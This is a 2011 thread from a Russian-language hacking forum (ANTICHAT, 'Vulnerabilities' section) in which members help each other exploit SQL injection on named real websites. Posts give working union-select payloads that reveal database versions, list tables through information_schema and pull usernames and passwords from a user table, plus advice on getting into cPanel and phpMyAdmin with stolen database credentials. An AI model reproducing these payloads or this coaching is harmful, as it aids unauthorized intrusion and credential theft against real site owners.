HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16851  
Старый 01.05.2011, 13:39
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Не пойму как тут дальше выводить:

Цитата:
Сообщение от None  
http://www.raarfm.com/shows/cinr_suite?id=-116'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103,104,105,106,107,108,109,110, 111,112,113,114,115,116,117,118,119,120,121,122,12 3,124,125,126,127,128,129,130,131,132+--+
 
Ответить с цитированием

  #16852  
Старый 01.05.2011, 13:50
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Код:
Code:
http://www.raarfm.com/shows/cinr_suite?id=116'and(1)=(0)union/*!all*/select(1),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,unhex(hex(version())),48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,(133)--+
4.1.14-STANDARD
 
Ответить с цитированием

  #16853  
Старый 02.05.2011, 12:41
probm
Guest
Сообщений: n/a
Провел на форуме:
1378

Репутация: 0
По умолчанию

помогите нубу расскрутить, и если там вообще таблицы

http://www.simonsig.co.za/about.php?id=1%27

http://www.ak-47.us/AK47-FAQ.php?id=137
 
Ответить с цитированием

  #16854  
Старый 02.05.2011, 12:58
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от probm  
probm said:
помогите нубу расскрутить, и если там вообще таблицы
http://www.simonsig.co.za/about.php?id=1%27
http://www.ak-47.us/AK47-FAQ.php?id=137
нуб..крути как слепую..или через ошибку выводи..за тебя делать никто ничего не собирается,хотя у второго 3-я версия мускуля...сложно будет для тебя
 
Ответить с цитированием

  #16855  
Старый 03.05.2011, 01:11
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от probm  
probm said:
помогите нубу расскрутить, и если там вообще таблицы
http://www.simonsig.co.za/about.php?id=1%27
Цитата:
Сообщение от None  
http://www.simonsig.co.za/ourWinesDisplay.php?TB_iframe=true&height=250&widt h=450&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,usr_user name,usr_password),8,9,0,11,12,13,14+from+user
// админские хеши не выкладываем
 
Ответить с цитированием

  #16856  
Старый 05.05.2011, 02:05
Fldr
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

У меня есть данные от базы на одном сайте. Но phpmyadmin я там не нашел.

Просканив сайт , обнаружил только ц.панель.

Возможно ли как то зайти в ц-панель или в базу данных. Зная только логин/пароль от самой базы. Сервер локалхост , так что через навикет не пускает.

И если кто то знает , может подсказать как генерируются логины для ц панели , то встречал что пароль от базы , такой же как и в ц панеле.
 
Ответить с цитированием

  #16857  
Старый 05.05.2011, 02:13
Fldr
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Moriarty  
Moriarty said:
cPanel: user12345
mysql: user12345_user
спасибо.

А возможно будет подключение к бд , через сайт соседа ?
 
Ответить с цитированием

  #16858  
Старый 05.05.2011, 11:24
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию

Цитата:
Сообщение от None  
А возможно будет подключение к бд , через сайт соседа ?
если хостер не разрешил (что обычно ими не разрешается), доступ "откуда-то", ты не сможешь зайти откуда-то в базу, лучше попробуй найти phpmyadmin, если на сайте не найдешь ищу у хостера

Например для всех сайтов на hc.ru можно зайти в базу так

phpmyadmin.hc.ru
 
Ответить с цитированием

  #16859  
Старый 05.05.2011, 22:55
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

как вывести названия таблиц?

http://mai1-ru.h2m.ru/yyy.php?id=1%27+union+select+1,2,table_name+from+i nformation_schema.tables%20where%201=%27
 
Ответить с цитированием

  #16860  
Старый 05.05.2011, 22:59
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

qaz

http://mai1-ru.h2m.ru/yyy.php?id=1'+and+false+union+select+1,2,table_nam e+FrOm+information_schema.tables+limit+1--%201
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ